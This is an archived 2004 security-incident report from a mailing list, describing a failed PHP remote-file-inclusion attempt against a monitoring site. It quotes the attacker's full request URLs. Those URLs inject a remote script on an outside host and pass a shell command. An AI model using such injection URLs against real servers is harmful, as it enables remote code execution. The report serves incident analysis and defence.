Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Incidents
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

PHP injection attempt from 200.222.244.154

from [Kirby Angell] Network Security [Permanent Link]
Subject: PHP injection attempt from 200.222.244.154
Date: Sat, 20 Nov 2004 15:23:04 -0600 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SOA: 20041120 14:34 CST
EOA: 20041120 14:34 CST

ATTACK-IP: 200.222.244.154/Linux/Brazil  (A1)
TARGET-IP: 204.249.195.250 (V1)

Summary

This attack was an attempt to get a malcious PHP script run on the
victim through a common PHP coding error. The web server's page in this
case was not susceptible to the attack and a 302 Not Found error was
returned.

The attacker IP was banned from the Alertra network to prevent future
attempts to compromise the network.

Narrative

The attacker IP made 4 attempts to exploit a common coding error found
in PHP applications. The flaw involves injecting a malicious URL into a
variable that the given PHP page later uses in an 'include' statement.
In all attempts, the given page was not susceptible to the attack and
therefore a 302 Not Found error was returned.

In the first attempt, the attacker tried:

http://uptime.alertra.com/uptime3?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a

The rest of the attempts the attacker tried:

http://uptime.alertra.com/uptime.php?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a

We see these attacks fairly often and they are usually not remarkable.
However, this one utilized attacks against two different pages. The odd
thing is that the pages are actually just different versions of the same
page. "uptime3" now redirects to "uptime.php". This is the second attack
of this style, featuring the same PHP injection vector. The first was
from 209.67.223.70.

This attack has been reported to the originating ISP, Telemar Norte
Leste S.A. See: response.

Threat Analysis

There doesn't seem to be any evidence of a prior crawling of the victim
web site. If it were an automated program that had been trolling for
victims, I would have expected it to just try "/uptime.php." Since it
tried both the old and new pages, it is possible that this is an
individual attacker that has done some research on the victim and then
tried a couple of different attacks. Arguing against that is the time
between attacks is small, likely meaning this was an automated process.

Most likely this was an automated process fed with search engine data on
PHP pages and not a specific attack on the victim.

- --
Thank you,

Kirby Angell
Get notified anytime your website goes down!
http://www.alertra.com
key: 9004F4C0
fingerprint: DD7E E88D 7F50 2A1E 229D  836A DB5B A751 9004 F4C0
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBn7W421unUZAE9MARAuCfAJ0cv34v0LQW7AKGBSTfHaRBFkv3VACghmh8
T0qfvXzNFweZhdjHEL//KR8=
=qeSX
-----END PGP SIGNATURE-----

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: is this a recon, or just some browser weirdness?, Martin Mačok
Next by Date:  RE: PHP injection attempt from 200.222.244.154, KEM Hosting
Previous by Thread:  New article announcement: Detecting Rootkits And Kernel-level Compromises In Linux, Daniel Hanson
Next by Thread:  RE: PHP injection attempt from 200.222.244.154, KEM Hosting
Indexes:  [Date] [Thread] [Top] [All Lists]